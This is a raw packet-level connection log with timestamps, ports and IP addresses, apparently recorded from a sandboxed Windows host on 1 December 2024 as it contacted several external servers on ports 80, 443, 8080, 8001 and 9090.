Dec 1, 2024 22:52:23.064557076 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.064568043 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.064615965 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.069695950 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.069713116 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.069808006 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.069819927 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.069869041 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.071244955 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.071317911 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.071327925 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.071343899 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.071404934 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.071623087 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:33.553921938 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:33.559473991 CET	49763	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:52:33.559545040 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:33.559595108 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:33.559659004 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:33.562676907 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:33.562783003 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:33.679582119 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:33.679714918 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:33.679950953 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:33.679969072 CET	80	49763	208.95.112.1	192.168.2.16
Dec 1, 2024 22:52:33.680025101 CET	49763	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:52:33.680030107 CET	80	49765	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:33.680078983 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:33.680681944 CET	80	49764	104.26.6.177	192.168.2.16
Dec 1, 2024 22:52:33.680758953 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:33.799913883 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.032438040 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.152954102 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.152971029 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.152990103 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.152997971 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.153006077 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.153024912 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.153037071 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.153065920 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.153074980 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.153075933 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.153090000 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.153126001 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.153137922 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.153153896 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.153178930 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.153209925 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.273289919 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.273329020 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.273365021 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.273403883 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.273422003 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.273432016 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.273461103 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.273488998 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.273515940 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.321521997 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.321664095 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.441451073 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.441576004 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.485424042 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.485506058 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.606293917 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.606369972 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.670275927 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.688334942 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.688447952 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:34.727332115 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.808427095 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:34.808460951 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:35.512845039 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:35.512892962 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:35.512975931 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:35.513238907 CET	49776	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:35.515387058 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:35.633116007 CET	8080	49776	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:35.635318041 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:35.635432005 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:35.635608912 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:35.755992889 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:35.991580963 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.111751080 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.111839056 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.111908913 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.111910105 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.111944914 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.111968040 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.111993074 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.112057924 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.112059116 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.112067938 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.112135887 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.112195015 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.112204075 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.112227917 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.112297058 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.231997967 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.232008934 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.232057095 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.232067108 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.232083082 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.232110023 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.232157946 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.232230902 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.273494959 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.273612022 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.393450975 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.393539906 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.437411070 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.437561989 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.557447910 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.557559013 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:36.621423960 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.801666975 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:36.801743031 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:37.049541950 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:37.049643040 CET	49777	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:37.301498890 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:37.837928057 CET	8080	49777	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:37.840881109 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:37.960896015 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:37.961000919 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:37.961215973 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.081069946 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.323451996 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.444392920 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444405079 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444412947 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444417000 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444473028 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.444510937 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.444678068 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444688082 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444694996 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444704056 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444734097 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.444766045 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.444820881 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444829941 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.444883108 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.565495968 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.565505981 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.565512896 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.565640926 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.565645933 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.565653086 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.565716028 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.609400034 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.609520912 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.729624987 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.729702950 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.777419090 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.777538061 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.893409014 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:38.893502951 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:38.965430021 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:39.141639948 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:39.141747952 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:39.393351078 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:39.393455982 CET	49778	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:39.547964096 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:39.550589085 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:39.641515970 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:39.670583963 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:39.670715094 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:39.670903921 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:39.790750027 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.028409004 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.148786068 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148798943 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148808002 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148821115 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148828983 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148885965 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148888111 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.148894072 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148938894 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.148947001 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148957014 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148983002 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.148997068 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.149035931 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.268939018 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.268945932 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.268949032 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.269011021 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.269027948 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.269052982 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.269102097 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.309351921 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.309452057 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.429395914 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.429476976 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.473376989 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.473442078 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.593370914 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.637377977 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.637489080 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:40.845412970 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:40.845489979 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:41.093429089 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:41.093492985 CET	49779	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:41.341433048 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:41.865766048 CET	8001	49779	185.189.159.121	192.168.2.16
Dec 1, 2024 22:52:41.868151903 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:41.988104105 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:41.988183975 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:41.988377094 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.108366013 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.350481033 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.470464945 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470474958 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470499992 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470566034 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470587969 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.470618010 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.470640898 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470648050 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470691919 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.470702887 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470711946 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470736980 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470767021 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.470781088 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.470890999 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.470941067 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.590595961 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.590606928 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.590670109 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.590677977 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.590691090 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.590729952 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.590743065 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.590789080 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.637495995 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.637686968 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.753473997 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.753577948 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.801429987 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.801498890 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.917417049 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:42.917493105 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:42.989389896 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:43.165373087 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:43.165441036 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:43.413433075 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:43.413532972 CET	49780	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:52:43.665431976 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:44.297066927 CET	8080	49780	65.21.49.163	192.168.2.16
Dec 1, 2024 22:52:44.299721003 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.419717073 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.419974089 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.420159101 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.540023088 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.771517038 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.891581059 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891593933 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891690969 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891694069 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.891704082 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891762972 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891765118 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.891772032 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891801119 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891824007 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891839981 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.891870975 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.891884089 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891916990 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:44.891932964 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:44.891959906 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.011828899 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.011842012 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.011894941 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.011904001 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.011907101 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.011921883 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.011955976 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.131722927 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.131858110 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.251848936 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.251962900 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.297418118 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.297561884 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.413408995 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.413496017 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.485456944 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.661429882 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.661520958 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:45.909424067 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:45.909514904 CET	49781	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:52:46.157569885 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:52:59.923108101 CET	8080	49778	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:59.928427935 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:52:59.928996086 CET	49783	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:53:00.048388004 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.048495054 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.048701048 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.049015045 CET	80	49783	172.217.19.164	192.168.2.16
Dec 1, 2024 22:53:00.049077988 CET	49783	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:53:00.049262047 CET	49783	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:53:00.168562889 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.169107914 CET	80	49783	172.217.19.164	192.168.2.16
Dec 1, 2024 22:53:00.400576115 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.520745039 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520756960 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520761013 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520764112 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520776033 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520845890 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520854950 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520880938 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.520903111 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520945072 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.520956039 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.520968914 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.520977974 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.521023989 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.641105890 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.641144037 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.641151905 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.641160965 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.641169071 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.641220093 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.641249895 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.681360006 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.681488037 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.801457882 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.801569939 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:00.845366001 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.965425968 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:00.965501070 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:01.169377089 CET	8001	49782	185.189.159.121	192.168.2.16
